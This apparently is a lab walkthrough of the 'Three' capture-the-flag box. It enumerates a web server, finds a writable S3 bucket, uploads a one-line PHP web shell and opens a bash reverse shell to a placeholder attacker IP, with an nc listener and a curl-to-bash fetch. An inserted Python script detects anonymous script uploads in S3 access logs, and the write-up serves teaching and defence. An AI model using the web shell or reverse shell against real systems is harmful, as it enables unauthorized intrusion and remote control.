As usual, let's start with nmap:

nmap -sV -sC targetIp

Let's add the target IP to the /etc/hosts file:

cd /etc
sudo nano hosts

We found port 80 open, so let's check the website:

Now let's use gobuster in vhost mode to enumerate virtual hosts (subdomains):

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb --append-domain

We found s3.thetoppers.htb.

Let's add s3.thetoppers.htb to the /etc/hosts file too.

We can interact with the S3 bucket using awscli:

sudo apt install awscli
aws configure

Just type "temp" for everything.

We can list all of the S3 buckets hosted by the server using the ls command:

aws --endpoint=http://s3.thetoppers.htb s3 ls

We can also use ls to list the objects and common prefixes under a specified bucket:

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

We can see the files index.php and .htaccess and a directory called images in the S3 bucket.

It looks like the Apache server is using this S3 bucket as storage.

We can use awscli not only to read files with ls, but also to copy files to a remote bucket.

First, let's create a file shell.php containing the code below:

<?php system($_GET["cmd"]); ?>

Now let's copy shell.php to the remote bucket using:

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

We have successfully uploaded shell.php to the bucket.
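
The upload works because the bucket accepts writes from an unauthenticated client and Apache serves whatever lands in it. Either condition on its own is a finding; together they are the whole box. The script below is an added example (not part of this writeup) showing how an operator would spot this in bucket access logs. It assumes the S3 service writes AWS-style server access log lines (owner, bucket, time, remote IP, requester, request ID, operation, key, request URI, status, ...), where an anonymous requester is logged as "-"; the writeup does not say which S3 implementation the target runs, so the log lines, IDs and addresses here are constructed for the example.

```python
import re
from pathlib import PurePosixPath

# Assumed: AWS-style S3 server access log lines. Only the leading fields are
# parsed; anything after the HTTP status is ignored.
#   owner bucket [time] remote_ip requester request_id operation key "request_uri" status ...
LOG_RE = re.compile(
    r'^(?P<owner>\S+) (?P<bucket>\S+) \[(?P<time>[^\]]+)\] (?P<ip>\S+) (?P<requester>\S+) '
    r'(?P<request_id>\S+) (?P<operation>\S+) (?P<key>\S+) "(?P<uri>[^"]*)" (?P<status>\d{3})'
)

# Operations that create or remove objects (single PUT, multipart upload, delete).
WRITE_OPS = {"REST.PUT.OBJECT", "REST.PUT.PART", "REST.POST.UPLOAD", "REST.DELETE.OBJECT"}
# Extensions the web server would hand to an interpreter instead of serving as data.
SERVER_SIDE_EXT = {".php", ".phtml", ".phar", ".php5", ".jsp", ".aspx", ".cgi"}
# Files that change how Apache serves a directory.
WEB_CONFIG_NAMES = {".htaccess"}
# Buckets known to back a web root (assumption: maintained by the defender).
WEB_ROOT_BUCKETS = {"thetoppers.htb"}

# Constructed sample log: an anonymous listing, an anonymous upload of a PHP
# file and of .htaccess, an authenticated image upload, and a normal read.
SAMPLE_S3_LOG = """\
OWNERID thetoppers.htb [10/Mar/2024:12:05:10 +0000] 10.10.14.5 - 7B4A0FABBEXAMPLE REST.GET.BUCKET - "GET /thetoppers.htb?list-type=2 HTTP/1.1" 200 - 1843 - 12 11 "-" "aws-cli/2.15.0"
OWNERID thetoppers.htb [10/Mar/2024:12:06:42 +0000] 10.10.14.5 - 3E57427F3EXAMPLE REST.PUT.OBJECT shell.php "PUT /thetoppers.htb/shell.php HTTP/1.1" 200 - - 34 28 27 "-" "aws-cli/2.15.0"
OWNERID thetoppers.htb [10/Mar/2024:12:06:55 +0000] 10.10.14.5 - 1A2B3C4D5EXAMPLE REST.PUT.OBJECT .htaccess "PUT /thetoppers.htb/.htaccess HTTP/1.1" 200 - - 61 25 24 "-" "aws-cli/2.15.0"
OWNERID thetoppers.htb [10/Mar/2024:12:07:01 +0000] 203.0.113.9 WEBMASTERID 9C1D8D7AAEXAMPLE REST.PUT.OBJECT images/band3.jpg "PUT /thetoppers.htb/images/band3.jpg HTTP/1.1" 200 - - 90001 51 49 "-" "aws-cli/2.15.0"
OWNERID thetoppers.htb [10/Mar/2024:12:07:30 +0000] 198.51.100.7 - 5F3A2C1BBEXAMPLE REST.GET.OBJECT images/band.jpg "GET /thetoppers.htb/images/band.jpg HTTP/1.1" 200 - 90001 90001 14 13 "http://thetoppers.htb/" "Mozilla/5.0"
"""


def parse_s3_line(line):
    """Parse the leading fields of one access-log line, or return None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(event):
    """Return the list of reasons a write event is suspicious (empty if none).
    Denied writes (4xx) are still reported: the attempt itself is the signal."""
    reasons = []
    if event["operation"] not in WRITE_OPS:
        return reasons
    if event["requester"] == "-":
        reasons.append("anonymous-write")
    if event["bucket"] in WEB_ROOT_BUCKETS:
        path = PurePosixPath(event["key"])
        if path.suffix.lower() in SERVER_SIDE_EXT:
            reasons.append("server-side-script-in-web-root-bucket")
        if path.name in WEB_CONFIG_NAMES:
            reasons.append("web-config-written")
    return reasons


def audit(lines):
    """Run classify() over every parseable line and collect the findings."""
    findings = []
    for line in lines:
        event = parse_s3_line(line)
        if not event:
            continue
        reasons = classify(event)
        if reasons:
            findings.append({
                "time": event["time"], "ip": event["ip"], "bucket": event["bucket"],
                "operation": event["operation"], "key": event["key"],
                "status": event["status"], "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_S3_LOG.splitlines()):
        print(f"[{f['time']}] {f['ip']} {f['operation']} {f['bucket']}/{f['key']} "
              f"status={f['status']} -> {', '.join(f['reasons'])}")
```

The extension check is per-key, so .htaccess gets its own rule: it has no suffix, but a write to it changes which files Apache treats as executable, which matters as much as the PHP file itself. The fix on the bucket side is to stop anonymous writes altogether; on the web side, a directory populated from object storage should not be allowed to execute server-side scripts at all.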

Let's go back to our browser and type:


This confirms we have code execution on the box.

Now we will use a reverse shell to make the victim connect back to our attacking machine.

Let's get a reverse shell by creating a new file containing:

bash -i >& /dev/tcp/<attackerIP>/1337 0>&1

Now let's listen on port 1337 using:

nc -lnvp 1337

Now we need to host that file on our own web server.

Let's create a local web server using:

python3 -m http.server 8000

We can use curl to fetch the file from our local host and pipe it to bash in order to execute it:


Let's go back to our netcat listener: we got the shell!

The flag is in the flag.txt file.
